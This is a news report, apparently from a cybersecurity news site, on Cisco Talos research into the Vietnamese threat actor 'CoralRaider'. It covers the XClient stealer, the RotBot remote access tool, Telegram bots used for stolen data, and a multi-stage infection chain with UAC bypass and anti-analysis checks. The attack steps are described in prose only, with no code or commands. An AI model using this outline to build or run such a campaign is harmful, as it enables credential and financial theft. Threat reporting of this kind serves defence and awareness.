A new threat actor known as "CoralRaider" targets victims' bank information, login passwords, and social network profiles. Apart from this it also includes accounts for companies and marketing.

The gang, which is of Vietnamese origin, has been operating since at least 2023. Plus, it also focuses on victims in numerous Asian and Southeast Asian nations.

In the most recent campaign, the attackers employed XClient stealer and RotBot. It is recognized as a modified version of QuasarRAT, as payloads.

To escape detection, RotBot, a remote access tool (RAT), conducts many tests on the victim's machine. These tests involve its IP address, ASN, and current processes.

The XClient stealer has substantial information-stealing capabilities. For this, we should be thankful for its plugin module and a range of modules. The best part of this plugin module is that it is helpful for performing remote administration operations.

Notable Tactics, Techniques, And Procedures (TTPs) Employed

According to Cisco Talos, the attacker used two Telegram bots. These bots are namely - "debug" for debugging and "online" for obtaining victim data.

On the other hand, the "debug" bot's desktop picture and Telegram appeared to be similar to those of the "online" bot.

This indicated that while testing the bot, the actor may have jeopardized their environment. 

Researchers discovered two additional images depicting several OneDrive folders.

Another image depicted an Excel file. It most likely included the victims' information. The spreadsheet has numerous tabs in Vietnamese.

 "CoralRaider had established Vietnamese words in several stealer functionalities of their payload XClient stealer", Talos researchers told Cyber Security News.

"The stealer function maps the stolen victim's data. The main goal of doing so was to hardcode Vietnamese words. Additionally, it’s also possible to write these words to a text file on the victim machine's temporary folder before exfiltration".

This malicious effort targets victims in South Korea, Bangladesh, Pakistan, Indonesia, Vietnam, India, China, and other Asian and Southeast Asian nations.

The Windows shortcut file acts as the campaign's initial vector. The mechanism by which the actor administered the LNKs to the victims is now unknown.

A malicious Windows shortcut file downloads and launches an HTML application file (HTA). The main source of downloading is a site that attackers use in the attack.

An embedded, obfuscated Visual Basic script runs when the HTA file is opened.

The PowerShell script is embedded in the memory by the malicious Visual Basic script. It is able to decrypt and sequentially run three other PowerShell scripts. These scripts download and launch the RotBot. Furthermore,  it disables Windows & application notifications, bypasses User Access Controls, and performs anti-VM and anti-analysis checks.

On the victim’s computer, RotBot is downloaded and launched through  the Printer Subsystem program “spoolsv.exe.” The threat actor has assembled and customized a RotBot specifically for this campaign.

The XClient Stealer takes use of victims’ browser data, credit card numbers, and social network login passwords.

It targets the data files for Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browsers. For this, it takes the help of the absolute paths of the corresponding browser installation paths.

Lastly, the XClient stealer generates a ZIP package and saves the victim’s social media information. The interesting part is that it is gathered into a text file in the local user profile temporary folder.

“Utilize secure passwords and change them frequently to safeguard yourself from the dangerous attacks mentioned before.”